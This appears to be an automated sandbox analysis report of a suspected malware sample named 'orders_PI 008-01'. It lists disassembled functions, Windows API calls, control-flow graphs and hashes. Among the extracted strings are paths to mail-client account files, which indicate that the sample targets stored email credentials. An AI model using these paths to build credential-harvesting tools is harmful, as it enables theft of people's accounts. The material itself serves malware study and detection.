                                        control_flow_graph 301 344b7cc2-344b7cd6 302 344b7cd8-344b7cdd 301->302 303 344b7d44-344b7d4c 301->303 302->303 304 344b7cdf-344b7ce4 302->304 305 344b7d4e-344b7d51 303->305 306 344b7d93-344b7dab call 344b7e35 303->306 304->303 308 344b7ce6-344b7ce9 304->308 305->306 307 344b7d53-344b7d90 call 344b571e * 4 305->307 316 344b7dae-344b7db5 306->316 307->306 308->303 311 344b7ceb-344b7cf3 308->311 314 344b7d0d-344b7d15 311->314 315 344b7cf5-344b7cf8 311->315 318 344b7d2f-344b7d43 call 344b571e * 2 314->318 319 344b7d17-344b7d1a 314->319 315->314 320 344b7cfa-344b7d0c call 344b571e call 344b90ba 315->320 321 344b7db7-344b7dbb 316->321 322 344b7dd4-344b7dd8 316->322 318->303 319->318 324 344b7d1c-344b7d2e call 344b571e call 344b91b8 319->324 320->314 329 344b7dbd-344b7dc0 321->329 330 344b7dd1 321->330 325 344b7dda-344b7ddf 322->325 326 344b7df0-344b7dfc 322->326 324->318 333 344b7ded 325->333 334 344b7de1-344b7de4 325->334 326->316 336 344b7dfe-344b7e0b call 344b571e 326->336 329->330 338 344b7dc2-344b7dd0 call 344b571e * 2 329->338 330->322 333->326 334->333 343 344b7de6-344b7dec call 344b571e 334->343 338->330 343->333
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 344B7D06
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B90D7
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B90E9
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B90FB
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B910D
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B911F
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B9131
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B9143
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B9155
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B9167
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B9179
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B918B
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B919D
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B91AF
                                        • _free.LIBCMT ref: 344B7CFB
                                          • Part of subcall function 344B571E: HeapFree.KERNEL32(00000000,00000000,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?), ref: 344B5734
                                          • Part of subcall function 344B571E: GetLastError.KERNEL32(?,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?,?), ref: 344B5746
                                        • _free.LIBCMT ref: 344B7D1D
                                        • _free.LIBCMT ref: 344B7D32
                                        • _free.LIBCMT ref: 344B7D3D
                                        • _free.LIBCMT ref: 344B7D5F
                                        • _free.LIBCMT ref: 344B7D72
                                        • _free.LIBCMT ref: 344B7D80
                                        • _free.LIBCMT ref: 344B7D8B
                                        • _free.LIBCMT ref: 344B7DC3
                                        • _free.LIBCMT ref: 344B7DCA
                                        • _free.LIBCMT ref: 344B7DE7
                                        • _free.LIBCMT ref: 344B7DFF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: 22798f8882eb48969c4228631812563cc0819d14bda6ea96e0a9f1b10761f291
                                        • Instruction ID: 01743fa4acafb627ba1f350aeb077382703f142f03d80a6dc1600e542363d4f2
                                        • Opcode Fuzzy Hash: 22798f8882eb48969c4228631812563cc0819d14bda6ea96e0a9f1b10761f291
                                        • Instruction Fuzzy Hash: DB313975600204EFFF61AA38DA40B66B7E9AF04394F50487EE8C8D7351DA31E8909B34
                                        Function 344B59D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • _free.LIBCMT ref: 344B59EA
                                          • Part of subcall function 344B571E: HeapFree.KERNEL32(00000000,00000000,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?), ref: 344B5734
                                          • Part of subcall function 344B571E: GetLastError.KERNEL32(?,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?,?), ref: 344B5746
                                        • _free.LIBCMT ref: 344B59F6
                                        • _free.LIBCMT ref: 344B5A01
                                        • _free.LIBCMT ref: 344B5A0C
                                        • _free.LIBCMT ref: 344B5A17
                                        • _free.LIBCMT ref: 344B5A22
                                        • _free.LIBCMT ref: 344B5A2D
                                        • _free.LIBCMT ref: 344B5A38
                                        • _free.LIBCMT ref: 344B5A43
                                        • _free.LIBCMT ref: 344B5A51
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 0b925750740d9879534a2a033d7f872b179b6eb951115be8032727316d5bf8bc
                                        • Instruction ID: d9a08297595f5a83d3986a26671b52ff08a8eb4e32709e01c10f925df892e8f5
                                        • Opcode Fuzzy Hash: 0b925750740d9879534a2a033d7f872b179b6eb951115be8032727316d5bf8bc
                                        • Instruction Fuzzy Hash: 4611B97A610148FFDF51EF54C841CDDBFA5EF08254F4540B9BD884F222DA31DA609BA4
                                        Function 344BAA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 385 344baa53-344baa6e 386 344baa80 385->386 387 344baa70-344baa7e RtlDecodePointer 385->387 388 344baa85-344baa8b 386->388 387->388 389 344babb2-344babb5 388->389 390 344baa91 388->390 393 344bac12 389->393 394 344babb7-344babba 389->394 391 344baa97-344baa9a 390->391 392 344baba6 390->392 396 344baaa0 391->396 397 344bab47-344bab4a 391->397 395 344baba8-344babad 392->395 398 344bac19 393->398 399 344babbc-344babbf 394->399 400 344bac06 394->400 403 344bac5b-344bac6a call 344b2ada 395->403 404 344baaa6-344baaab 396->404 405 344bab34-344bab42 396->405 401 344bab9d-344baba4 397->401 402 344bab4c-344bab4f 397->402 406 344bac20-344bac49 398->406 407 344babfa 399->407 408 344babc1-344babc4 399->408 400->393 414 344bab61-344bab8f 401->414 411 344bab51-344bab54 402->411 412 344bab94-344bab9b 402->412 415 344baaad-344baab0 404->415 416 344bab25-344bab2f 404->416 405->406 432 344bac4b-344bac50 call 344b6368 406->432 433 344bac56-344bac59 406->433 407->400 409 344babee 408->409 410 344babc6-344babc9 408->410 409->407 420 344babcb-344babd0 410->420 421 344babe2 410->421 411->403 422 344bab5a 411->422 412->398 414->433 417 344bab1c-344bab23 415->417 418 344baab2-344baab5 415->418 416->406 429 344baac7-344baaf7 417->429 424 344bab0d-344bab17 418->424 425 344baab7-344baaba 418->425 426 344babdb-344babe0 420->426 427 344babd2-344babd5 420->427 421->409 422->414 424->406 425->403 430 344baac0 425->430 426->395 427->403 427->426 429->433 439 344baafd-344bab08 call 344b6368 429->439 430->429 432->433 433->403 439->433
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: DecodePointer
                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                        • API String ID: 3527080286-3064271455
                                        • Opcode ID: 25fb4806cb4f646501fc6f2b955e9f3a813ebc304f20996f0f01e0963c74b8df
                                        • Instruction ID: 457b635e7bfdb742913d7ff5e8e5e23cd3713d4393bf3408a6ef47e71eea04da
                                        • Opcode Fuzzy Hash: 25fb4806cb4f646501fc6f2b955e9f3a813ebc304f20996f0f01e0963c74b8df
                                        • Instruction Fuzzy Hash: DA518BB8A04609DBEF01CFA4EA4819CBFB4FB4A211F5441B9D5D1B6314CB798E25CB39
                                        Function 344B1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D1B
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,?,00000080,00000000,?,?,00000000), ref: 344B1D37
                                        • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D4B
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D58
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D72
                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D7D
                                        • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D8A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 1454806937-0
                                        • Opcode ID: 2fd375445b81130c0a4f486a775be8893509ddc2f0b0e9adc248c6046efafb2b
                                        • Instruction ID: e9c44db5898f5bbc8380999957cdb4463d5ac1985c70b8f85c81cfe97c168830
                                        • Opcode Fuzzy Hash: 2fd375445b81130c0a4f486a775be8893509ddc2f0b0e9adc248c6046efafb2b
                                        • Instruction Fuzzy Hash: 5C212FB594121CBFFF10DFA49C8CEEB76ACEB08398F0005B5F591E2140D6749E468A74
                                        Function 344B9492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 459 344b9492-344b94ef GetConsoleCP 460 344b9632-344b9644 call 344b2ada 459->460 461 344b94f5-344b9511 459->461 463 344b952c-344b953d call 344b7c19 461->463 464 344b9513-344b952a 461->464 470 344b953f-344b9542 463->470 471 344b9563-344b9565 463->471 466 344b9566-344b9575 call 344b79e6 464->466 466->460 475 344b957b-344b959b WideCharToMultiByte 466->475 473 344b9609-344b9628 470->473 474 344b9548-344b955a call 344b79e6 470->474 471->466 473->460 474->460 481 344b9560-344b9561 474->481 475->460 477 344b95a1-344b95b7 WriteFile 475->477 479 344b962a-344b9630 GetLastError 477->479 480 344b95b9-344b95ca 477->480 479->460 480->460 482 344b95cc-344b95d0 480->482 481->475 483 344b95fe-344b9601 482->483 484 344b95d2-344b95f0 WriteFile 482->484 483->461 485 344b9607 483->485 484->479 486 344b95f2-344b95f6 484->486 485->460 486->460 487 344b95f8-344b95fb 486->487 487->483
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,344B9C07,?,00000000,?,00000000,00000000), ref: 344B94D4
                                        • __fassign.LIBCMT ref: 344B954F
                                        • __fassign.LIBCMT ref: 344B956A
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 344B9590
                                        • WriteFile.KERNEL32(?,?,00000000,344B9C07,00000000,?,?,?,?,?,?,?,?,?,344B9C07,?), ref: 344B95AF
                                        • WriteFile.KERNEL32(?,?,?,344B9C07,00000000,?,?,?,?,?,?,?,?,?,344B9C07,?), ref: 344B95E8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 1c3f6473ed7458bf19015a63952ed312784189a03b2a3073ced10ad9956cb61a
                                        • Instruction ID: 0d60f3e0d79b0c492a88cf5d9086a1b0a0f5d28cad9a9f40f15d5c8b3d802503
                                        • Opcode Fuzzy Hash: 1c3f6473ed7458bf19015a63952ed312784189a03b2a3073ced10ad9956cb61a
                                        • Instruction Fuzzy Hash: 0C5184B5904209AFDF10CFA8C895ADEBBB8EF09310F14456AE5D5E7281E670D942CF64
                                        Function 344B3370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 488 344b3370-344b33b5 call 344b3330 call 344b37a7 493 344b33b7-344b33c9 488->493 494 344b3416-344b3419 488->494 496 344b3439-344b3442 493->496 497 344b33cb 493->497 495 344b341b-344b3428 call 344b3790 494->495 494->496 500 344b342d-344b3436 call 344b3330 495->500 499 344b33d0-344b33e7 497->499 501 344b33e9-344b33f7 call 344b3740 499->501 502 344b33fd 499->502 500->496 510 344b33f9 501->510 511 344b340d-344b3414 501->511 503 344b3400-344b3405 502->503 503->499 506 344b3407-344b3409 503->506 506->496 509 344b340b 506->509 509->500 512 344b33fb 510->512 513 344b3443-344b344c 510->513 511->500 512->503 514 344b344e-344b3455 513->514 515 344b3486-344b3496 call 344b3774 513->515 514->515 517 344b3457-344b3466 call 344bbbe0 514->517 521 344b34aa-344b34c6 call 344b3330 call 344b3758 515->521 522 344b3498-344b34a7 call 344b3790 515->522 523 344b3468-344b3480 517->523 524 344b3483 517->524 522->521 523->524 524->515
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 344B339B
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 344B33A3
                                        • _ValidateLocalCookies.LIBCMT ref: 344B3431
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 344B345C
                                        • _ValidateLocalCookies.LIBCMT ref: 344B34B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 597c235ba590cad899073c7bbf45b66d02507fe75ff7affc250cee790732bf31
                                        • Instruction ID: 34b19c5def7c933824e9a5c9155501669066fa515153e1d8d5a2543ef102d27b
                                        • Opcode Fuzzy Hash: 597c235ba590cad899073c7bbf45b66d02507fe75ff7affc250cee790732bf31
                                        • Instruction Fuzzy Hash: 38419878A00208EFDF01CF6AC84459EBBB5EF45324F148179D9D59B352EBB19915CBA0
                                        Function 344B925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 344B9221: _free.LIBCMT ref: 344B924A
                                        • _free.LIBCMT ref: 344B92AB
                                          • Part of subcall function 344B571E: HeapFree.KERNEL32(00000000,00000000,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?), ref: 344B5734
                                          • Part of subcall function 344B571E: GetLastError.KERNEL32(?,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?,?), ref: 344B5746
                                        • _free.LIBCMT ref: 344B92B6
                                        • _free.LIBCMT ref: 344B92C1
                                        • _free.LIBCMT ref: 344B9315
                                        • _free.LIBCMT ref: 344B9320
                                        • _free.LIBCMT ref: 344B932B
                                        • _free.LIBCMT ref: 344B9336
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                        • Instruction ID: 4293504c3fd231d15a9910103e571fb8acc09a05c0753dd0dfaaaa0cce00d457
                                        • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                        • Instruction Fuzzy Hash: F2113D71A40B08EEEE68ABB0DC45FCBFB9D9F08704F408C3DAAD966053DA75E5144A61
                                        Function 00406773 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                        • wsprintfW.USER32 ref: 004067C5
                                        • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3879383872.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000003.00000002.3879368188.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879403378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879455624.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879598230.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879598230.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%S.dll$UXTHEME$\
                                        • API String ID: 2200240437-1946221925
                                        • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                        • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                        • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                        • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8
                                        Function 344B8821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,344B6FFD,00000000,?,?,?,344B8A72,?,?,00000100), ref: 344B887B
                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,344B8A72,?,?,00000100,5EFC4D8B,?,?), ref: 344B8901
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 344B89FB
                                        • __freea.LIBCMT ref: 344B8A08
                                          • Part of subcall function 344B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 344B5702
                                        • __freea.LIBCMT ref: 344B8A11
                                        • __freea.LIBCMT ref: 344B8A36
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 9134551f37c613f50e912bd7ed756b418cc70175b62c35e1e8a26fd73c9becfb
                                        • Instruction ID: 55c6cb3019f837b43bedecb9f00b963e134c3806987e81fe5f378cad9c579eb1
                                        • Opcode Fuzzy Hash: 9134551f37c613f50e912bd7ed756b418cc70175b62c35e1e8a26fd73c9becfb
                                        • Instruction Fuzzy Hash: 2B51B1B6610616AFEF158E74CC41EAB77A9EF48794F11463DF8C4E6240EB34DC5186B0
                                        Function 344B1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 344B1038
                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 344B104B
                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 344B1061
                                        • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 344B1075
                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 344B1090
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 344B10B8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrlen$AttributesFilelstrcat
                                        • String ID:
                                        • API String ID: 3594823470-0
                                        • Opcode ID: 811e4c42ba955658b7f17ed8e442b6ca04558aa2b064bf860dbb16950e2d26e1
                                        • Instruction ID: e1956692aff439bf62bf1de2d9584f21053e498220dfa3082d13b2b22134f49d
                                        • Opcode Fuzzy Hash: 811e4c42ba955658b7f17ed8e442b6ca04558aa2b064bf860dbb16950e2d26e1
                                        • Instruction Fuzzy Hash: 30217176900728DBDF10DA64DC48DDB3768EF44298F1045BAE8DA971A2DE309A86CB60
                                        Function 344B3856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,344B3518,344B23F1,344B1F17), ref: 344B3864
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 344B3872
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 344B388B
                                        • SetLastError.KERNEL32(00000000,?,344B3518,344B23F1,344B1F17), ref: 344B38DD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 33a8bf6aeebcf720445812c51bb98a324f4478526d7d5914387f1f6b21477eec
                                        • Instruction ID: 78366bde9ce60b16624d7b4a865e15a1d641c0e44d56a56bd5f709897925b945
                                        • Opcode Fuzzy Hash: 33a8bf6aeebcf720445812c51bb98a324f4478526d7d5914387f1f6b21477eec
                                        • Instruction Fuzzy Hash: E501F17760CF11AEBF00957BAC849562B94DF05678720023DE0D0A81D6FEA248029239
                                        Function 344B5AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,344B6C6C), ref: 344B5AFA
                                        • _free.LIBCMT ref: 344B5B2D
                                        • _free.LIBCMT ref: 344B5B55
                                        • SetLastError.KERNEL32(00000000,?,?,344B6C6C), ref: 344B5B62
                                        • SetLastError.KERNEL32(00000000,?,?,344B6C6C), ref: 344B5B6E
                                        • _abort.LIBCMT ref: 344B5B74
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: ce6f75f47038e8f5a3aaed7d8f398529e4c1429d8bd8a75a1e6fe648de34553f
                                        • Instruction ID: f8f2cbdaf2bcec3d6b27294b1285bcfde63e98f0662f77df1d3c118fdc2950a4
                                        • Opcode Fuzzy Hash: ce6f75f47038e8f5a3aaed7d8f398529e4c1429d8bd8a75a1e6fe648de34553f
                                        • Instruction Fuzzy Hash: 54F0A97A608A00EFFFC262347C44E0AE629DFC556DB140138F9D4A6281FE3488034178
                                        Function 344B11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 344B1E89: lstrlenW.KERNEL32(?,?,?,?,?,344B10DF,?,?,?,00000000), ref: 344B1E9A
                                          • Part of subcall function 344B1E89: lstrcatW.KERNEL32(?,?,?,344B10DF,?,?,?,00000000), ref: 344B1EAC
                                          • Part of subcall function 344B1E89: lstrlenW.KERNEL32(?,?,344B10DF,?,?,?,00000000), ref: 344B1EB3
                                          • Part of subcall function 344B1E89: lstrlenW.KERNEL32(?,?,344B10DF,?,?,?,00000000), ref: 344B1EC8
                                          • Part of subcall function 344B1E89: lstrcatW.KERNEL32(?,344B10DF,?,344B10DF,?,?,?,00000000), ref: 344B1ED3
                                        • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 344B122A
                                          • Part of subcall function 344B173A: _strlen.LIBCMT ref: 344B1855
                                          • Part of subcall function 344B173A: _strlen.LIBCMT ref: 344B1869
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                        • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                        • API String ID: 4036392271-1520055953
                                        • Opcode ID: 2bb473521429607bd98b50d2d0c45ed17edfb978ab6b09649e19f2a87a5a1161
                                        • Instruction ID: 8b4c21cfd3e57052bf8a8b7b314e03aabf98ac8ef697d3ed8a94d5db388ff4e7
                                        • Opcode Fuzzy Hash: 2bb473521429607bd98b50d2d0c45ed17edfb978ab6b09649e19f2a87a5a1161
                                        • Instruction Fuzzy Hash: DE21C3B9E10208ABFF1097A4EC81FED7339EF80754F00056AF645EB1D1EAB11D818B68
                                        Function 0040669D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
